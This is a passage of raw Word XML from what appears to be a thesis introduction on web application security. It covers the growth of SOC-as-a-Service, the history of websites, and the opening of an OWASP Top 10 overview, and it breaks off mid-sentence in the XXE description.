        <w:t xml:space="preserve"> the shortage of manpower in this industry.</w:t>
      </w:r>
      <w:r w:rsidR="00820CA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> With automation, companies are starting to focus on creating more intelligent tools</w:t>
      </w:r>
      <w:r w:rsidR="009E3DDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and relocating the human resources to services that require human touch, such as customer support.</w:t>
      </w:r>
      <w:r w:rsidR="00AA725B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Today, we see a rise in managed services offered by companies, where they offer to manage the services based on the clients’ needs rather than have the clients manage themselves. Some examples of managed services in this industry are managing rules and policies of Web Application Firewall</w:t>
      </w:r>
      <w:r w:rsidR="002B62A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAF)</w:t>
      </w:r>
      <w:r w:rsidR="003D2BE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, creating custom policies and rules based on the clients’ requirements</w:t>
      </w:r>
      <w:r w:rsidR="00AA725B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33245D4C" w14:textId="59D94ABA" w:rsidR="00576CC3" w:rsidRPr="003773AA" w:rsidRDefault="00DD2F93" w:rsidP="00651F01">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc71138467"/>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="003E7314" w:rsidRPr="003773AA">
        <w:t>Research Motivation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="173D64B1" w14:textId="37032403" w:rsidR="003E7314" w:rsidRDefault="00F4581F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Today, we know that almost everything in our lives is going virtual. Due to the ongoing Covid-19 global pandemic, </w:t>
      </w:r>
      <w:r w:rsidR="00BD3E91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>which has forced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> majority of the world’s population to </w:t>
      </w:r>
      <w:r w:rsidR="00BD3E91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">change the working landscape, all companies were forced to </w:t>
      </w:r>
      <w:r w:rsidR="00057492">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>adopt some form of</w:t>
      </w:r>
      <w:r w:rsidR="00BD3E91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> digital transformation</w:t>
      </w:r>
      <w:r w:rsidR="00057492">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, to a varying extent</w:t>
      </w:r>
      <w:r w:rsidR="00BD3E91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. This includes non-technology companies.</w:t>
      </w:r>
      <w:r w:rsidR="00593C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This sudden transformation had </w:t>
      </w:r>
      <w:r w:rsidR="00593C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">caused many problems for everyone, where one of the biggest and most pressing problem lying in cyber security. </w:t>
      </w:r>
      <w:r w:rsidR="001A5277">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pushing one’s operations and data digital is difficult but having the proper</w:t>
      </w:r>
      <w:r w:rsidR="00743A4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> skills and</w:t>
      </w:r>
      <w:r w:rsidR="001A5277">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> knowledge to secure the data is more difficult for the majority of the population.</w:t>
      </w:r>
      <w:r w:rsidR="00EC6406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> As a result, people look into outsourcing the needed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958BBA6" w14:textId="7B35CC3E" w:rsidR="001A5277" w:rsidRDefault="00CC0515" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">According to a report by MarketsandMarkets Research (2020), the </w:t>
      </w:r>
      <w:r w:rsidR="007D4255">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">market for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Operations Cent</w:t>
      </w:r>
      <w:r w:rsidR="007D4255">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>re (SOC) as a Service (SOCaaS) is projected to grow to USD 1.656 billion by 2025 from USD 471 million in 2020.</w:t>
      </w:r>
      <w:r w:rsidR="0068675A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Asia Pacific</w:t>
      </w:r>
      <w:r w:rsidR="000D3372">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (APAC)</w:t>
      </w:r>
      <w:r w:rsidR="0068675A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifically Singapore, was mentioned in the report to </w:t>
      </w:r>
      <w:r w:rsidR="00394C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>expect to have</w:t>
      </w:r>
      <w:r w:rsidR="0068675A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the highest growth rate</w:t>
      </w:r>
      <w:r w:rsidR="00815B32">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the SOCaaS market</w:t>
      </w:r>
      <w:r w:rsidR="00DA2831">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which has seen high adoption from non-IT industries such as financial institutions, healthcare, retail and the public sector</w:t>
      </w:r>
      <w:r w:rsidR="003227AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, amongst others</w:t>
      </w:r>
      <w:r w:rsidR="0068675A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000D3372">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The report also showed that more money was spent in fully managed services than co-managed or hybrid services in APAC region.</w:t>
      </w:r>
      <w:r w:rsidR="007F7E09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, enterprises have also shared concerns over the SOCaaS providers having full control should things go wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E95A83" w14:textId="23F287B2" w:rsidR="00EB3B02" w:rsidRDefault="00EB3B02" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">As more companies go virtual, the use of web applications </w:t>
      </w:r>
      <w:r w:rsidR="004E47F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> more readily adopted.</w:t>
      </w:r>
      <w:r w:rsidR="004E47F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many may have the perception that having a single point of security such as integration of WAF is sufficient to protect against cyber-attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D22CC8" w14:textId="69B5F48F" w:rsidR="0054485A" w:rsidRDefault="0054485A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The growing market and choices</w:t>
      </w:r>
      <w:r w:rsidR="007E1885">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ranging from self-managed to fully managed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cyber security services are strong motivating factors for this thesis’s research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5062F6" w14:textId="59E90DB5" w:rsidR="00B820A7" w:rsidRPr="003177A6" w:rsidRDefault="00DD2F93" w:rsidP="00C3244D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc71138468"/>
      <w:r>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="003177A6" w:rsidRPr="003177A6">
        <w:t>Web Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="305A68F2" w14:textId="2EE1EE8E" w:rsidR="003177A6" w:rsidRDefault="00350BF1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The first website to ever be published on the Internet was created and published by Berners-Lee, in 1991, two years after he invented the World Wide Web</w:t>
      </w:r>
      <w:r w:rsidR="00AB38D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and developed Hypertext Transfer Protocol (HTTP) in </w:t>
      </w:r>
      <w:r w:rsidR="000F3952">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1990</w:t>
      </w:r>
      <w:r w:rsidR="006C32D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Nix, 2018)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C32D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00135639">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>That first website was a simple, static page, aptly sharing what World Wide Web was. Till today, the definition of a website has not changed. A website refers to a collection of static pages that are published on the World Wide Web</w:t>
      </w:r>
      <w:r w:rsidR="00BA45FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50505F" w14:textId="7882CCB8" w:rsidR="00BA45FD" w:rsidRDefault="00BA45FD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Over the years, websites have evolved </w:t>
      </w:r>
      <w:r w:rsidR="003D1365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>into web applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> having various functions, making transactions with the servers</w:t>
      </w:r>
      <w:r w:rsidR="003D1365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web applications</w:t>
      </w:r>
      <w:r w:rsidR="003D1365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic websites which are always having </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>their content change.</w:t>
      </w:r>
      <w:r w:rsidR="0061459B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Some famous examples of web applications are Facebook, the world’s largest social media platform and Wordpress, the world’s most used content management system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B7A9F" w14:textId="1C322A79" w:rsidR="00DD2F93" w:rsidRPr="00DD2F93" w:rsidRDefault="00DD2F93" w:rsidP="00C3244D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc71138469"/>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00C977DA" w:rsidRPr="00C977DA">
        <w:t>Cyber-attacks on Web Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="79487F67" w14:textId="28AB803A" w:rsidR="005B2B59" w:rsidRDefault="00842D3F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cyber-attacks</w:t>
      </w:r>
      <w:r w:rsidR="002D5845">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">on web applications </w:t>
      </w:r>
      <w:r w:rsidR="002D5845">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>have been statistically on the rise in recent years.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF397A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are various common web application attack vectors.</w:t>
      </w:r>
      <w:r w:rsidR="0023799B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Open Web Application Security Project (OWASP), a non-profit organisation, whose purpose is to improve the security of software. OWASP’s projects are globally well accepted as a universal standard for cyber security. One of them is the OWASP Top 10, “</w:t>
      </w:r>
      <w:r w:rsidR="0023799B" w:rsidRPr="0023799B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a standard awareness document for developers and web application security</w:t>
      </w:r>
      <w:r w:rsidR="0023799B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” (OWASP, 2017). OWASP Top 10 lists the top 10 web application security risks. The latest list was released in 2017 and the previous list in 2013. OWASP is currently working on the latest version of the list and is expected to be released in autumn of 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11589262" w14:textId="73729C7A" w:rsidR="0023799B" w:rsidRDefault="0023799B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The top 10 web application security risks as described by OWASP are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760AE0D" w14:textId="77777777" w:rsidR="001C40A8" w:rsidRDefault="0023799B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9F2F4" w14:textId="75D0F976" w:rsidR="0023799B" w:rsidRPr="001C40A8" w:rsidRDefault="001106C6" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection consists of various injection types such as SQL, PHP command, </w:t>
      </w:r>
      <w:r w:rsidR="0032614D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Operating System (</w:t>
      </w:r>
      <w:r w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="0032614D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and LDAP. This risk happens when a malicious piece of data</w:t>
      </w:r>
      <w:r w:rsidR="001C40A8" w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or payload</w:t>
      </w:r>
      <w:r w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is sent as part of a web request in a form of query or command.</w:t>
      </w:r>
      <w:r w:rsidR="001C40A8" w:rsidRPr="001C40A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The malicious payload is typically used to get the server to execute the commands or access data without the necessary authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABDD63" w14:textId="63F4D9D5" w:rsidR="0023799B" w:rsidRDefault="0023799B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355A562" w14:textId="0503A9DF" w:rsidR="001C40A8" w:rsidRPr="001C40A8" w:rsidRDefault="00B82F82" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken authentication </w:t>
      </w:r>
      <w:r w:rsidR="00D756E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>happens when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> authentication and session management functions within a web application </w:t>
      </w:r>
      <w:r w:rsidR="00D756E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>are not implemented correctly. This allows threat actors to compromise login credentials, session tokens or even assume identities of other users through exploiting the flaws of the authentication’s implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F400F8" w14:textId="3D04C33F" w:rsidR="0023799B" w:rsidRDefault="0023799B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sensitive data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC32039" w14:textId="1E61B29F" w:rsidR="005F7993" w:rsidRPr="005F7993" w:rsidRDefault="005F7993" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sensitive data exposure refers to situation when web applications and Application Programming Interfaces (APIs) do not protect their sensitive data properly through usage of extra protection. Such protection include encryption, be it in transit or at rest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4CD7B" w14:textId="34E27CD6" w:rsidR="0023799B" w:rsidRDefault="0023799B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>XML external entities (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC006C" w14:textId="2E5B02EE" w:rsidR="00F2447A" w:rsidRPr="00F2447A" w:rsidRDefault="00D96D87" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE </w:t>
      </w:r>
      <w:r w:rsidR="002277E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">risks refer to when external entities are used to divulge internal files through remote code execution, internal port scanning or file shares, denial of service attacks and the use of file URI handler. This risk is normally due to older XML process or those that are poorly </w:t>
      </w:r>
      <w:r w:rsidR="00171AC5">
        <w:rPr>
